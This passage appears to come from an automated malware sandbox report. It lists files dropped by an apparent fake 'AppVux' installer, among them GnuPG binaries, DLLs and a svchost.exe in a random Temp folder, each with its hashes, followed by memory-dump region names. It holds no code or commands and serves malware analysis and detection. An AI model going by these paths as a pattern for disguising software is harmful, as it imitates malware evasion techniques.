| SHA256 | 124698ea407083fde0664ac4e950ea55f60d880f8ed636a05473a0e92e592dde |
| SHA512 | 62c8de1381115e2d7f787791ab53385b9c112696f2d7163b1c9e014eead13d9550f8f916d614f18ff791c23187ec987fd749e80fc4b376104ae6c1b6b0a0fc37 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-crt-conio-l1-1-0.dll
| MD5 | 031dc390780ac08f498e82a5604ef1eb |
| SHA1 | cf23d59674286d3dc7a3b10cd8689490f583f15f |
| SHA256 | b119adad588ebca7f9c88628010d47d68bf6e7dc6050b7e4b787559f131f5ede |
| SHA512 | 1468ad9e313e184b5c88ffd79a17c7d458d5603722620b500dba06e5b831037cd1dd198c8ce2721c3260ab376582f5791958763910e77aa718449b6622d023c7 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-util-l1-1-0.dll
| MD5 | 735636096b86b761da49ef26a1c7f779 |
| SHA1 | e51ffbddbf63dde1b216dccc753ad810e91abc58 |
| SHA256 | 5eb724c51eecba9ac7b8a53861a1d029bf2e6c62251d00f61ac7e2a5f813aaa3 |
| SHA512 | 3d5110f0e5244a58f426fbb72e17444d571141515611e65330ecfeabdcc57ad3a89a1a8b2dc573da6192212fb65c478d335a86678a883a1a1b68ff88ed624659 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | 43e1ae2e432eb99aa4427bb68f8826bb |
| SHA1 | eee1747b3ade5a9b985467512215caf7e0d4cb9b |
| SHA256 | 3d798b9c345a507e142e8dacd7fb6c17528cc1453abfef2ffa9710d2fa9e032c |
| SHA512 | 40ec0482f668bde71aeb4520a0709d3e84f093062bfbd05285e2cc09b19b7492cb96cdd6056281c213ab0560f87bd485ee4d2aeefa0b285d2d005634c1f3af0b |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-sysinfo-l1-1-0.dll
| MD5 | 9d43b5e3c7c529425edf1183511c29e4 |
| SHA1 | 07ce4b878c25b2d9d1c48c462f1623ae3821fcef |
| SHA256 | 19c78ef5ba470c5b295dddee9244cbd07d0368c5743b02a16d375bfb494d3328 |
| SHA512 | c8a1c581c3e465efbc3ff06f4636a749b99358ca899e362ea04b3706ead021c69ae9ea0efc1115eae6bbd9cf6723e22518e9bec21f27ddaafa3cf18b3a0034a7 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-synch-l1-2-0.dll
| MD5 | d175430eff058838cee2e334951f6c9c |
| SHA1 | 7f17fbdcef12042d215828c1d6675e483a4c62b1 |
| SHA256 | 1c72ac404781a9986d8edeb0ee5dd39d2c27ce505683ca3324c0eccd6193610a |
| SHA512 | 6076086082e3e824309ba2c178e95570a34ece6f2339be500b8b0a51f0f316b39a4c8d70898c4d50f89f3f43d65c5ebbec3094a47d91677399802f327287d43b |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-synch-l1-1-0.dll
| MD5 | 6c3fcd71a6a1a39eab3e5c2fd72172cd |
| SHA1 | 15b55097e54028d1466e46febca1dbb8dbefea4f |
| SHA256 | a31a15bed26232a178ba7ecb8c8aa9487c3287bb7909952fc06ed0d2c795db26 |
| SHA512 | ef1c14965e5974754cc6a9b94a4fa5107e89966cb2e584ce71bbbdd2d9dc0c0536ccc9d488c06fa828d3627206e7d9cc8065c45c6fb0c9121962ccbecb063d4f |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-string-l1-1-0.dll
| MD5 | 7a15b909b6b11a3be6458604b2ff6f5e |
| SHA1 | 0feb824d22b6beeb97bce58225688cb84ac809c7 |
| SHA256 | 9447218cc4ab1a2c012629aaae8d1c8a428a99184b011bcc766792af5891e234 |
| SHA512 | d01dd566ff906aad2379a46516e6d060855558c3027ce3b991056244a8edd09ce29eacec5ee70ceea326ded7fc2683ae04c87f0e189eba0e1d38c06685b743c9 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\stylers.model.xml
| MD5 | 343b8f55f376e88674733286d027f834 |
| SHA1 | 466886054d5c2641ba6058f58a7a84053aa4696e |
| SHA256 | f002b36e70f0fb159885c21fa6e6395176cd50a254201a94cbed756d9843fa9a |
| SHA512 | ef6643badbb87739f0ae847d201651f8d3e677c54ca2aa3f81277b053355772f71d9b0f490617c104ce861a29e2b283fe6d82faf4cfe8f10bfc571d683cfea8e |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libintl-8.dll
| MD5 | 16b4dba3e3bfdea7a528cc97721cbe60 |
| SHA1 | 2a75d604f72ea1d1d929280b6b945b168a18f137 |
| SHA256 | b6939316ebc272b67fa90a8c599dceec0e22b93a7a9660c7b0db0ff1cc1308ae |
| SHA512 | 4d524e689a064a2a1d381033f05f635f0e5cb5863d0c1dd1cee4bf80303e0bf3db8d787ff52d348c6938bacea7ac695de10da747782696d18172951452a98ef9 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\gpg-wks-client.exe
| MD5 | ee38ab14557b765c80856531582f4f89 |
| SHA1 | 660b872aaadd6658729f943f78bb45699e38f7c6 |
| SHA256 | 4b0dfcc928a127b65928f6a941823b0e43c4cf08e2792e1e054a3886d51d8005 |
| SHA512 | 4c4690c7af542ad5d67121259ec25dd67565273ea791f1a7e0536193f74115fb309054c44e336b19fee273dde71ab8543a2810a10dc2ba9eca5c7b286b46bcca |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\gpgtar.exe
| MD5 | a33215c3311b5819d6f12400b49333ab |
| SHA1 | 8d9338414b6e17cb9454b26b410abf7381e68eba |
| SHA256 | 45d80a39499a2dbfa3352169a7fb78492f7a253ca3ec6b0a6f61825b7c3a235d |
| SHA512 | 219fcc80b0362004ece4aeec22f93085166de6e8969b45c26f671412ff3b238c95e14f439a6efd8d06177fe790c781ddfd21e8a21a6100bfb8b08bd2e69d5973 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\gpgsm.exe
| MD5 | c1bb0e52c1e07b706804c5262207852a |
| SHA1 | 741d5972d06c09f7eb3c85dd573e302ff80d55e4 |
| SHA256 | e7d50bfc7ea031e4438b227e5f3c1c231aac831ccb709b08f6d4e3106d448b5e |
| SHA512 | cd6d04bc70a77ee6299e2d7c0e832c1104fd16ffd0243e6bff36910850cccb17fca86a297369bb0cb7c19ef674adc2089aaac3fa173184ec1f93bbb123957295 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\dirmngr.exe
| MD5 | 2e94c3258f7863b6bf4ea937aa12a144 |
| SHA1 | c5bf59d3b038f9bb9f7e05706e9e80f21ff3b022 |
| SHA256 | 2cc38c48eb742a28a4562bc62c9dca7ef525a62164752135b45a4cff89064e6e |
| SHA512 | 0925f11504f6972ede8525d3f7050060034a785963772a8b0f8d38d9feba47c1f9f55dafc959eea1d1789d8a4fbe03639c3f44ae848aef971d1a51371ce1fe2b |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libassuan-0.dll
| MD5 | 4f1849e84694314b868505c1dcc53747 |
| SHA1 | 06b8274e2569b32b5f9cf36202952e70b2fb4b02 |
| SHA256 | f69073ed88c6e72ae3244ca310bb43892eb97a4ede9e20fa457e0d8fb72a3b24 |
| SHA512 | 1956d6a9963b5eb712e7e61bccb3846677622838889b3de1820cc99f0b2aec81e3fba3456275f06be0b6a9ec573a502b38de7f0d32393447b385cad53c426d50 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\gnupg.exe
| MD5 | e7a712a20275825b93d9b86464755870 |
| SHA1 | 64bd04917a18d2faa75c46470461d550733aea61 |
| SHA256 | 4e6f3f339ded64578816dfc3dc1d74ba198f7d698109c15ac658bb9891e2ea9e |
| SHA512 | c1ef6aca74b674386521a54c435524cd1adfb70e5fb43fee48929ba1ff631f7e2cba2c773fc6976c72b7095c0e8c73e0766a3977f2cb8798560cbaada9cfcec3 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\zlib1.dll
| MD5 | f191ee2ae39bd67d4cc12c3667634d42 |
| SHA1 | e37aac8dc0da948eab6f24bbcd8495790cf99fd6 |
| SHA256 | df230f50a409db9ee949b9fdb10d7c08de03b5e3a0f72e7feb2618e436e1967a |
| SHA512 | 9e8d4eb00225cb646a8f5cbd8a36d9994150dd1b16029d9e9c0cdf5158f71642a761c887dcf680517a164770429f37f04412448351d9247f9cf2d2da6694c7ab |
C:\Config.Msi\e5ac807.rbs
| MD5 | ca4adf13d5bc7c3af0d84bc58a1bbe36 |
| SHA1 | aa1c69eb5f9300f9c9ffb8441db359f577ad7ae0 |
| SHA256 | ca322b1fbe8346a514a9583c6c9fb93c7231565990ff51e55fede78d303bdf70 |
| SHA512 | 7dff8de500fda6c5e27ffd4098bcd6d487048c9ab5d68fc0bf1111dd2cdc64a570d3b50d059207596dae45f42492ecef79b44963040611b52cf4e5170befed65 |
memory/1604-658-0x0000000000820000-0x0000000000845000-memory.dmp
memory/4288-659-0x0000000000C60000-0x0000000000C88000-memory.dmp
memory/1604-660-0x0000000000400000-0x000000000053E000-memory.dmp
memory/4288-661-0x0000000000C60000-0x0000000000C88000-memory.dmp
memory/1604-662-0x0000000065A80000-0x0000000065AAA000-memory.dmp
memory/1604-665-0x0000000063080000-0x00000000630A9000-memory.dmp
memory/1604-667-0x0000000066580000-0x00000000666AA000-memory.dmp
memory/4288-664-0x0000000000C60000-0x0000000000C88000-memory.dmp
memory/1604-663-0x000000006B480000-0x000000006B4C1000-memory.dmp
memory/4288-666-0x0000000000C60000-0x0000000000C88000-memory.dmp
memory/1640-681-0x00007FF85C460000-0x00007FF85CE4C000-memory.dmp
memory/1640-682-0x000002349E200000-0x000002349E210000-memory.dmp
memory/1640-683-0x000002349E200000-0x000002349E210000-memory.dmp
memory/1640-684-0x000002349E210000-0x000002349E232000-memory.dmp
memory/1640-692-0x000002349E3C0000-0x000002349E436000-memory.dmp
memory/1640-710-0x000002349E200000-0x000002349E210000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe
| MD5 | a9c5924063a253f64fb86bc924be6996 |
| SHA1 | c39ba1e011318b3edf295d4bdde3d56b5de89972 |
| SHA256 | eb1b278b91a8f183f9749948abd9556ec21b03ca852c53e423d824d5d7cc3de4 |
| SHA512 | 57f0f5e8fa907d92feb6175ab32253bfef9f6acf25e5ce3273f12fd428e76a07ec7c8fc007dc2c13dc0c6841222d8874fb7e362d7cbe70f287583782cd3d311e |
memory/1640-734-0x000002349E200000-0x000002349E210000-memory.dmp
memory/4288-743-0x0000000000C60000-0x0000000000C88000-memory.dmp
memory/4288-744-0x0000000000120000-0x0000000000220000-memory.dmp
memory/4288-745-0x00000000054B0000-0x0000000005538000-memory.dmp
memory/4288-746-0x0000000006610000-0x0000000006A10000-memory.dmp
memory/4288-748-0x0000000006610000-0x0000000006A10000-memory.dmp
memory/4288-749-0x00007FF87D4A0000-0x00007FF87D67B000-memory.dmp
memory/4288-750-0x0000000006610000-0x0000000006A10000-memory.dmp
memory/4288-752-0x00000000744F0000-0x00000000746B2000-memory.dmp
memory/3040-753-0x0000000002780000-0x0000000002789000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\kyV4XPwc2QRqDcs..dat
| MD5 | f0f942c7faac4695ff0e7002a21a12a6 |
| SHA1 | f9f1c24d6494aabe71b1d18da68cb2fbf77d4add |
| SHA256 | eb203f4ad6ae7bab5e9608b3fd3e1d2e014393b9131dd46bb09640a299ef1006 |
| SHA512 | 5b18e7f41e00f622aad2b176011cf5498f7f7fdd4a5c93f95b3502bb060c9a3d62548640d93e3d8a9043bcb63aa68e420b5c468480d0894baff1802e460a9ac7 |
memory/3040-757-0x00000000044E0000-0x00000000048E0000-memory.dmp
memory/3040-759-0x00007FF87D4A0000-0x00007FF87D67B000-memory.dmp
memory/3040-761-0x00000000044E0000-0x00000000048E0000-memory.dmp
memory/1640-758-0x00007FF85C460000-0x00007FF85CE4C000-memory.dmp
memory/3040-763-0x00000000744F0000-0x00000000746B2000-memory.dmp
memory/1640-764-0x000002349E200000-0x000002349E210000-memory.dmp
memory/3040-762-0x00007FF87D4A0000-0x00007FF87D67B000-memory.dmp
memory/3040-765-0x00000000044E0000-0x00000000048E0000-memory.dmp
memory/3040-766-0x00000000044E0000-0x00000000048E0000-memory.dmp
memory/4288-771-0x00000000054B0000-0x0000000005538000-memory.dmp
memory/4288-772-0x0000000006610000-0x0000000006A10000-memory.dmp
memory/1640-773-0x000002349E200000-0x000002349E210000-memory.dmp
memory/1640-783-0x000002349E200000-0x000002349E210000-memory.dmp